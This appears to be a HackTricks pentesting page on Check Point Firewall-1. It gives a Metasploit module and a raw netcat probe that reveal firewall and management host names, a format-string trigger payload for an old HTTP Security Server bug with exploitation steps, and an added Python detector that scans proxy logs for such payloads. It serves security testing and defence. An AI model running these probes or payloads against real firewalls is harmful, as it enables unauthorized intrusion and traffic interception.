# 264/tcp - Pentesting Check Point Firewall

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

It is possible to interact with CheckPoint Firewall-1 firewalls to discover useful information such as the firewall name and the management station name. This can be done by sending a query to port 264/TCP.

## Obtaining the Firewall and Management Station Names

Using a pre-authentication request, you can run a module that targets CheckPoint Firewall-1. The commands required for this operation are listed below:

```bash
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10
```

During execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of the firewall and of the SmartCenter management host. Here is an example of what the output may look like:

```
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```

## Alternative Method for Discovering the Hostname and ICA Name

Another technique involves a direct command that sends a specific query to the firewall and parses the response to capture the firewall's hostname and ICA name. The command and its structure are as follows:

```bash
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
```

The output of this command provides detailed information about the firewall's certificate name (CN) and organization (O), as shown below:

```
CN=Panama,O=MGMTT.srv.rxfrmi
```

## HTTP Security Server Format String Bug (CAN-2004-0039)

Affected builds: NG FCS, NG FP1, NG FP2, NG FP3 HF2, and NG with Application Intelligence R54/R55.
Requirement: the HTTP Security Server or the AI HTTP proxy must be enabled and explicitly inspecting the targeted port; if HTTP inspection is disabled, the vulnerable code path is never reached.

### Triggering the error handler

The proxy rejects malformed HTTP messages and builds its own error page with `sprintf(errbuf, attacker_string);`, allowing attacker-controlled bytes to be used as the format string. Send an invalid request through the firewall and observe the proxy-generated error that echoes your payload:

```bash
printf 'BOGUS%%08x%%08x%%08x%%n HTTP/1.0\r\nHost: internal.local\r\n\r\n' | nc -nv [FIREWALL_IP] 80
```

If HTTP inspection is enabled, the firewall (not the backend server) answers immediately, confirming that the middlebox parsed and replayed the request line.

### Exploitation

#### Format string primitive

- Force the parser into the error routine (invalid method, URI, or headers).
- Place attacker-controlled dwords up front so that the %x, %s, and %n directives are consumed as stack arguments.
- Use %x/%s to leak pointers, then %n/%hn to write the formatted byte count to chosen addresses, overwriting return pointers, vtables, or heap metadata before hijacking execution with injected shellcode or ROP.

#### Heap overflow primitive

The same unsafe sprintf() writes into a fixed-size heap buffer. Combine a long request body with oversized directives (e.g. %99999x) so that the formatted output exceeds the allocation and corrupts adjacent heap structures, letting you forge freelist pointers or function tables that are later dereferenced.
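Both primitives above leave the same trace in the proxy's access log: a request line carrying printf directives. As an added example (not code from the original page or from Check Point), the following Python detector scans constructed, Common Log Format-style entries for the indicators discussed in the two sections above: `%n`/`%hn` write directives, runs of `%x`/`%s`/`%p` leak directives, and oversized widths such as `%99999x`. The log lines, the 1000-character width threshold and the three-leak threshold are assumptions chosen for illustration.

```python
import re
# printf-style directive: flags, width, precision, length modifier, conversion
# ("%%", a literal percent sign, matches too and is skipped below).
DIRECTIVE = re.compile(
    r"%[-+ #0]*(?P<width>\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|L|q|j|z|t)?(?P<conv>[diouxXeEfgGcspn%])"
)
WRITE_CONVS = {"n"}                 # %n / %hn store the byte count in memory
LEAK_CONVS = {"x", "X", "s", "p"}   # typical for dumping stack words / pointers
MAX_SANE_WIDTH = 1000               # assumed: wider than any legitimate field
def analyze_request_line(req_line):
    """Count format-string indicators in one HTTP request line."""
    found = {"writes": 0, "leaks": 0, "oversized": 0}
    for m in DIRECTIVE.finditer(req_line):
        conv = m.group("conv")
        if conv == "%":
            continue
        if conv in WRITE_CONVS:
            found["writes"] += 1
        elif conv in LEAK_CONVS:
            found["leaks"] += 1
        width = m.group("width") or "0"
        if width == "*" or int(width) > MAX_SANE_WIDTH:
            found["oversized"] += 1
    return found

def is_suspicious(found):
    # One memory write, one oversized width, or a run of leaks is enough to alert.
    return found["writes"] > 0 or found["oversized"] > 0 or found["leaks"] >= 3

# Common Log Format: client ident user [time] "request" status ...
CLF = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def scan_log(text):
    """Return (client, request line, indicators) for each suspicious entry."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        found = m and analyze_request_line(m.group("req"))
        if found and is_suspicious(found):
            hits.append((m.group("src"), m.group("req"), found))
    return hits
# Constructed sample log: a normal request, the probe from the text above,
# a percent-encoded URL (harmless "%25o" match) and an oversized width.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2004:13:55:36 +0000] "GET /index.html HTTP/1.0" 200 1234
10.0.0.7 - - [10/Oct/2004:13:55:40 +0000] "BOGUS%08x%08x%08x%n HTTP/1.0" 400 512
10.0.0.9 - - [10/Oct/2004:13:55:42 +0000] "GET /search?q=100%25off HTTP/1.0" 200 900
10.0.0.11 - - [10/Oct/2004:13:55:43 +0000] "GET /%99999x HTTP/1.0" 400 512
"""
```

`scan_log(SAMPLE_LOG)` reports only the second and fourth entries; percent-encoded URLs like `%25off` match the regex as a harmless `%25o` and are not flagged, so decode URLs before scanning only if your proxy logs them decoded.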

### Impact

Compromising the proxy grants code execution inside the firewall process (SYSTEM on Windows appliances, root on UNIX), allowing rule manipulation, traffic interception, and further pivoting into the management network.
